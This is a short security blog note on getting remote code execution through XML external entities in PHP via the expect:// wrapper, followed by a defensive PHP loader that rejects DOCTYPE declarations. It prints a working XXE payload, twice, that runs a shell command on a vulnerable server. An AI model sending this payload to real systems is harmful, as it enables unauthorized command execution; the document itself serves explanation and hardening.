Cardboard Iguana Security

RCE via XXE in PHP

Saturday, June 14, 2025 (1 min read)

  • AttackCycle/Exploitation/XXE
  • Language/PHP
  • FileFormat/XML

If the target is written in PHP, the PHP expect extension is loaded, and XML input is parsed with external entity resolution enabled, then defining a SYSTEM entity whose value is expect://$COMMAND gets you RCE via XXE.

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxerce SYSTEM "expect://id">]>
<root>&xxerce;</root>

Don’t expect to run into this often, however: this combination of factors is fairly rare.
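The flip side for anyone maintaining PHP code that parses XML. The following is an added example, not code from the original note: a loader that refuses any DOCTYPE in untrusted input and never enables entity substitution, plus a small audit helper that reports whether the expect:// stream wrapper is even registered on the host. The function names (loadUntrustedXml, expectWrapperAvailable, XmlLoadError) are my own; LIBXML_NOENT, LIBXML_NONET, libxml_disable_entity_loader and stream_get_wrappers are standard PHP.

```php
<?php
// Added example (not from the original page): defensive XML loading for PHP.
declare(strict_types=1);

final class XmlLoadError extends RuntimeException {}

/**
 * Audit helper: true if the expect:// wrapper is registered, i.e. the expect
 * extension is loaded and the page's payload would have something to hit.
 */
function expectWrapperAvailable(): bool
{
    return in_array('expect', stream_get_wrappers(), true);
}

/**
 * Load untrusted XML into a DOMDocument without resolving entities.
 *
 * The vulnerable pattern is loadXML($xml, LIBXML_NOENT): that flag turns on
 * entity substitution, so a SYSTEM entity is expanded through whatever stream
 * wrapper its URL names (expect://, php://, file://, ...).
 *
 * Here:
 *  - LIBXML_NOENT is deliberately absent, so entities are never substituted;
 *  - LIBXML_NONET forbids the parser from fetching anything over the network;
 *  - a DOCTYPE in the input is rejected outright, so no entity can even be
 *    declared (API input has no legitimate reason to carry its own DTD).
 */
function loadUntrustedXml(string $xml): DOMDocument
{
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        throw new XmlLoadError('DOCTYPE declarations are not accepted');
    }

    // PHP < 8.0: older libxml builds allowed external entity loading by
    // default; switch it off explicitly. (Deprecated and unnecessary on 8.x.)
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    $previous = libxml_use_internal_errors(true);
    try {
        $doc = new DOMDocument();
        $ok = $doc->loadXML($xml, LIBXML_NONET);
        if ($ok === false) {
            $msgs = array_map(fn($e) => trim($e->message), libxml_get_errors());
            throw new XmlLoadError('XML parse error: ' . implode('; ', $msgs));
        }
        return $doc;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($previous);
    }
}

// --- demonstration -------------------------------------------------------

echo 'expect:// wrapper registered: ', expectWrapperAvailable() ? 'yes' : 'no', "\n";

// The note's payload, used here only as input to the hardened loader.
$payload = <<<'XML'
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxerce SYSTEM "expect://id">]>
<root>&xxerce;</root>
XML;

try {
    loadUntrustedXml($payload);
    echo "unexpected: payload accepted\n";
} catch (XmlLoadError $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// Ordinary input (constructed) still parses normally.
$benign = '<?xml version="1.0"?><root><item>ok</item></root>';
$doc = loadUntrustedXml($benign);
echo $doc->getElementsByTagName('item')->item(0)->textContent, "\n";
```

Run it with the CLI (php loader.php): the payload is rejected at the DOCTYPE check before libxml ever sees the entity, and the benign document prints ok. The DOCTYPE check is defence in depth; the actual protection is that LIBXML_NOENT is never passed, so even if a DTD slipped through, no entity would be substituted.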


Backlinks

  • PHP
  • XML external entity (XXE) attacks

